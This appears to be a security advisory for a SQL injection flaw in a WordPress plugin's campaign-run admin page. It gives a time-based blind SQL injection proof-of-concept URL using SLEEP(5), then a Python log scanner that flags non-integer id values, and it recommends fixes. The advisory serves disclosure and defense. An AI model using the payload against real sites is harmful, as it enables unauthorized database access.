Description
The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admin+ to perform SQL injection attacks.
As an admin, open a link like:
http://example.com/wp-admin/admin.php?page=enl-campaigns&action=campaign-run&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)
There will be a delay indicating that the injection has succeeded.
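The request above carries SQL in a parameter that should only ever hold an integer, so a digits-only check on `id` is enough to spot it in web server logs. The following is an added example, not code from the plugin or the advisory; the combined log format, the IP addresses and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=enl-campaigns&action=campaign-run&id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=enl-campaigns&action=campaign-run&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP) HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=other-plugin&id=abc HTTP/1.1" 200 900
203.0.113.8 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin.php?action=campaign-run&page=enl-campaigns&id=12abc HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")  # ASCII digits only


def is_campaign_run(path, params):
    """True for the admin page and action named in the advisory's URL."""
    return (
        path.endswith("/wp-admin/admin.php")
        and params.get("page") == ["enl-campaigns"]
        and params.get("action") == ["campaign-run"]
    )


def suspicious_id_requests(log_text):
    """Return (client_ip, decoded_id) for campaign-run requests whose id is not an integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # parse_qs percent-decodes values, so encoded payloads are compared in clear form.
        params = parse_qs(url.query, keep_blank_values=True)
        if not is_campaign_run(url.path, params):
            continue
        for value in params.get("id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_id_requests(SAMPLE_LOG):
        print(f"{ip}: non-integer id {value!r}")
```

The same digits-only rule is what the plugin should enforce server-side, for example by casting `id` to an integer or binding it with `$wpdb->prepare()` and a `%d` placeholder.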